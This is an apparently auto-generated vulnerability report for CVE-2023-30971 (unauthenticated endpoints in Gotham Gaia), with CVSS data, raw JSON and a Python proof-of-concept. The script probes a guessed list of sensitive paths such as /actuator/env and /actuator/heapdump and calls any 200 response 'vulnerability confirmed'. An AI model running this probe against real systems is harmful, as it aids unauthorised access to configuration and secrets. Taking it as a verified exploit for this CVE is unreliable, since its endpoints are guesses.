Security Vulnerability Report
中文
CVE-2023-30971 CVSS 6.8 MEDIUM

CVE-2023-30971

Published: 2025-12-19 17:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Gotham Gaia application was found to be exposing multiple unauthenticated endpoints.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Gotham Gaia (版本未明确披露)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2023-30971 - Gotham Gaia Unauthenticated Endpoints PoC # Target: Gotham Gaia application with exposed unauthenticated endpoints def check_vulnerability(target_url): """ Check if the target Gotham Gaia instance has unauthenticated endpoints exposed """ results = [] # Common endpoints that might be exposed endpoints = [ "/api/v1/users", "/api/v1/config", "/api/v1/admin", "/api/v1/data", "/api/v1/system", "/api/v1/health", "/api/v1/metrics", "/api/v1/status", "/swagger-ui.html", "/actuator/env", "/actuator/configprops", "/actuator/heapdump" ] for endpoint in endpoints: try: url = target_url.rstrip('/') + endpoint response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: results.append({ "endpoint": endpoint, "status": "EXPOSED", "status_code": 200, "content_length": len(response.content) }) print(f"[+] Exposed endpoint found: {endpoint}") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected endpoint: {endpoint}") else: print(f"[*] Endpoint {endpoint} returned: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {str(e)}") return results if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2023-30971.py <target_url>") print("Example: python cve-2023-30971.py https://gotham-gaia.example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning {target} for CVE-2023-30971...") print("=" * 50) exposed = check_vulnerability(target) print("=" * 50) if exposed: print(f"[!] Found {len(exposed)} exposed endpoints - vulnerability confirmed") else: print("[+] No exposed endpoints found - target may not be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-30971", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:49.697", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gotham Gaia application was found to be exposing multiple unauthenticated endpoints."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-592"}]}], "references": [{"url": "https://palantir.safebase.us/?tcuUid=4d833960-b5a8-4750-abef-9c447fcd89fb", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.